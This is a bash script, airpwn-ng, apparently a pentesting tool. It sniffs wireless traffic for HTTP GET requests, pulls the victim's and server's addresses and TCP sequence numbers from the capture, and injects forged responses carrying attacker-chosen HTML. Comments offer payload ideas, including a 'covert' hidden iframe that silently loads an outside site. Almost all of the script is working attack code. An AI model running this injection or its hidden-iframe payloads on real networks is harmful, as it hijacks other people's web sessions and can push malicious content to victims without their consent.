#!/usr/bin/env bash

##~~~~~~~~~~~~~~~~~~~~~~~~~ File and License Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
## Filename: airpwn-ng
## Version:  1.0
## Copyright (C) <2015>  <stryngs>

##  This program is free software: you can redistribute it and/or modify
##  it under the terms of the GNU General Public License as published by
##  the Free Software Foundation, either version 3 of the License, or
##  (at your option) any later version.

##  This program is distributed in the hope that it will be useful,
##  but WITHOUT ANY WARRANTY; without even the implied warranty of
##  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
##  GNU General Public License for more details.

##  You should have received a copy of the GNU General Public License
##  along with this program.  If not, see <http://www.gnu.org/licenses/>.
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##

##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Legal Notice ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
## This script was written with the intent for Legal PenTesting uses only.
## Make sure that you have consent prior to use on a device other than your own.
## Doing so without the above is a violation of Federal/State Laws within the United States of America.
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##

##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thoughts... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
## I consider any script/program I write to always be a work in progress.
## Please send any tips/tricks/streamlining ideas/comments/kudos via email to: info [AT] ethicalreporting.org

## Comments written with a triple # are notes to myself, please ignore them.
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##


##~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits and Kudos ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
## First and foremost, to God above for giving me the abilities I have, Amen.

## toast and his excellent work with the original concept of airpwn.  airpwn-ng wouldn't exist without the original work done by him...
## Thank you for allowing me to have the privilege of the original name.  I hope this script lives up to what it should be!

## The "Community" for always working towards improving the existing.....

## Kudos to my wife for always standing by my side, having faith in me, and showing the greatest of patience for my obsession with hacking.

## blind for the excellent work at finding the wireshark URL that helped with parsing the GET / function for airpwn-ng

## The wireshark community for it's excellent String Matching Capture Filter Generator
	# https://www.wireshark.org/tools/string-cf.html
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##


##~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Inject File Ideas ~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
## Ballsy
# <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
# <html xmlns="http://www.w3.org/1999/xhtml">
#   <head>
#     <meta http-equiv="content-type" content="application/xhtml+xml; charset=iso-8859-1" />
#     <title>Inject PWN</title>
#     <meta content="hacking, hackers, pwn, packet-injection"
#       name="keywords" />
#     <meta content="Packet Injection 101" name="description" />
#   </head>
#   <body><iframe src="http://www.site.com"></iframe></body></html>

## Covert
# <div style="position:absolute;top:-9999px;left:-9999px;visibility:collapse;">
#  <iframe src="http://www.site.com"></iframe>
# </div>
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##


##~~~~~~~~~~~~~~~~~~~~~~~ BEGIN Repetitious Functions ~~~~~~~~~~~~~~~~~~~~~~~##
monitor--()
{
## src MAC -- Victim
vicmac=$(awk '{print $15}' LOG | cut -d: -f 2-)

## src MAC -- Router LAN MAC
rtrmac=$(awk '{print $16}' LOG | cut -d: -f 2-)

## src IP -- Victim
vicip=$(awk '{print $34}' LOG | cut -d. -f -4)

## src port -- Victim
vicport=$(awk '{print $34}' LOG | cut -d. -f 5-)

## dst IP -- Server
svrip=$(awk '{print $36}' LOG | cut -d. -f -4)

## svr port -- Server
svrport=$(awk '{print $36}' LOG | cut -d. -f 5- | sed 's/://')

## sequence number + length
acknum=$(awk '{print $40}' LOG | cut -d: -f2 | sed 's/,//')

## old acknowledgement number
seqnum=$(awk '{print $42}' LOG | sed 's/,//')
}
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##


##~~~~~~~~~~~~~~~~~~~~~~~~~~~ Launch Conditions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
wrn="\033[31m"   ## Warnings / Infinite Loops
ins="\033[1;32m" ## Instructions
out="\033[1;33m" ## Outputs
hdr="\033[1;34m" ## Headers
inp="\033[36m"   ## Inputs
wtf="\033[34m"   ## WTFs
rst="\e[0m"      ## Reset
current_ver=1.0
rel_date="21 April 2015"

if [[ "$UID" -ne 0 ]];then
        echo -e "$wrn\nMust be ROOT to run this script$rst"
        exit 1
fi

if [[ -z $1  || -z $2 || -z $3 ]]; then
	echo -e "$ins\nUsage: ./airpwn-ng <Inject File> <Sniff NIC> <Inject NIC>$rst"
	exit 1
fi
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##


##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MAIN ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
## Prepare the hex inject string
inject=$(echo "0x$(cat $1 | xxd -g1 -ps | fold -w2 | paste -sd ' ')")

while true; do
	tcpdump -i $2 -c 1 -eKnSt 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' 1>LOG &
	inotifywait -r -e modify ./LOG
	monitor--
	
	## inject the packet
	packit -i $3 -R -nnn -a $acknum -D $vicport -F PA -q $seqnum -S $svrport -d $vicip -s $svrip -X $rtrmac -Y $vicmac -p "$inject"
done
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
